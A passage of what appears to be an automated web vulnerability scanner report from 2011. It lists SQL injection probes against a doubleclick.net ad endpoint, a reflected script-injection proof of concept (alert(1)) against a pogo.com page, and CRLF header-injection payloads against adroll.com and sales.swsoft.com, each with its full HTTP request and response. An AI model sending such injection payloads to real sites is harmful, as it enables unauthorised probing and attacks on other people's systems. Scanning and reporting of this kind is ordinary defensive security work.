<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3''&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:29:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 3841
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
1.3. http://googleads.g.doubleclick.net/pagead/ads [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600'&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:23:43 GMT
Server: cafe
Cache-Control: private
Content-Length: 9000
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600''&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:23:44 GMT
Server: cafe
Cache-Control: private
Content-Length: 3757
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
2. Cross-site scripting (stored)  previous  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 4d781</script><script>alert(1)</script>9d640d4f59f was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:29 GMT
Server: Apache-Coyote/1.1
Content-Length: 12410


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo
...[SNIP]...
2.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 31393</script>041f4ab8ff6 was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 12389


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="
...[SNIP]...
3. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 94d4d%0d%0ad5e6278b016 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif94d4d%0d%0ad5e6278b016?0.18809315958060324 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif94d4d
d5e6278b016:
Date: Fri, 24 Jun 2011 13:32:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 440f8%0d%0afd67be24785 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/440f8%0d%0afd67be24785/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM?pv=26143364701.420067&cookie=ABL75QCUY5EGNEJJXWHGIG%3A1%7C36AMQQX26NAKPETSLKXA3W%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A2&width=468&height=60&x=0&y=0&keyw=&cpm=g)))TgSPJQAHQHIK5XdUBd5fQRecsO_YZwjowKwVMA HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=60&slotname=2204023174&w=468&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921637628&bpp=5&shv=r20110615&jsv=r20110616&correlator=1308921637930&frm=4&adk=1151138738&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=1&dtd=426&xpc=k1mQeRIDm4&p=http%3A//phuket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Fri, 24 Jun 2011 13:24:15 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/440f8
fd67be24785/Y2YJ7A74HNGIZPY5GRC64S/aa124d880659045d2ecfa27a65500c85.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

3.3. http://sales.swsoft.com/buyonline/ [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the key request parameter is copied into the location response header. The payload cde47%0d%0a51dddc47dfc was submitted in the key parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=windows&locale=en-US&key=cde47%0d%0a51dddc47dfc HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=cde47
51dddc47dfc
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

3.4. http://sales.swsoft.com/buyonline/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the location response header. The payload 63065%0d%0a38879286b1d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=windows&locale=en-US&key=SMB015741170000&63065%0d%0a38879286b1d=1 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000&63065
38879286b1d=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

3.5. http://sales.swsoft.com/buyonline/ [os parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the os request parameter is copied into the location response header. The payload c2c42%0d%0ade299d446bb was submitted in the os parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=c2c42%0d%0ade299d446bb&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/addons/?store_id=1&version=10.0.0&os=c2c42
de299d446bb&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

3.6. http://sales.swsoft.com/buyonline/ [store_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the store_id request parameter is copied into the location response header. The payload 71e53%0d%0a84c3c05dd74 was submitted in the store_id parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=71e53%0d%0a84c3c05dd74&version=10.0.0&os=windows&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=71e53
84c3c05dd74&version=10.0.0&os=windows&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

3.7. http://sales.swsoft.com/buyonline/ [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the version request parameter is copied into the location response header. The payload 454ba%0d%0a35cbc67735f was submitted in the version parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=454ba%0d%0a35cbc67735f&os=windows&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
